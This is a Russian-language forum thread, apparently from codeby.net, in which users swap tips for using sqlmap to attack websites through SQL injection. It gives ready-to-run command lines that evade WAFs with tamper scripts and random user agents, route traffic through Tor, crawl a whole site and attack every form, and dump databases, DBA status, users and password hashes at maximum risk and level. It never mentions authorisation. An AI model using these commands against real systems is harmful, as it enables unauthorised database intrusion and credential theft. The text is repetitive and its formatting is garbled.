Спасибо большое! Обязательно попробую. Расскажите, пожалуйста про "куки или CSRF токен" как этим пользоваться и где почитать?1. Поиграться с tamper-ами если есть WAF. Вот отличная статья в тему https://codeby.net/threads/obxodim-waf-s-pomoschju-sqlmap.60865/
2. Включить режим отображения запросов и посмотреть на какие запросы приходят ошибки. Опция -v 6(--verbose 6)
3. Поиграться с User-Agent опция --random-agent или ручками задать через опцию --user-agent
4. Если инъекция по типу Time Based Blind и интернет-соединение медленное (например через прокси или тор) выставить параметр --time-sec на 10 сек.
5. Добавить опцию по игнорированию редиректов -- --ignore-redirects
Можно еще кучу чего придумать: например проверить ненужны ли при запросах куки или CSRF токен.
--crawl --batch
- эти параметры позволяют указать только адрес сайта, без всяких ссылок. Можно писать site.com
вместо site.com/index.php?id=1
, сам облазит весь сайт и попробует атаку.#sqlmap --random-agent -u site.com --form --crawl=2 --batch
а результат где сохранит?--crawl --batch - эти параметры позволяют указать только адрес сайта, без всяких ссылок. Можно писать site.com вместо site.com/index.php?id=1 , сам облазит весь сайт и попробует атаку.
#sqlmap --random-agent -u site.com --form --crawl=2 --batch
Если что найдет - даст ссылку на отчет. Типо - .sqlmap/site.comа результат где сохранит?
--current-db
- покажет текущую БД--is-dba
- привилегии(FALSE | TRUE)--dbs
- покажет все БД./sqlmap.py -u "" --hpp --ignore-code=404 --ignore-redirects --random-agent -f --banner --is-dba --dbs --current-user --password --keep-alive --threads=1 --timeout=100 --time-sec=100 --tor-type=SOCKS5 --risk=3 --level=5 --tamper="between,randomcase,space2comment"
можно так начинать а потом уже играться далееРезультат будет тут : с//user/sqlmap/домен сайтаа результат где сохранит?
Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab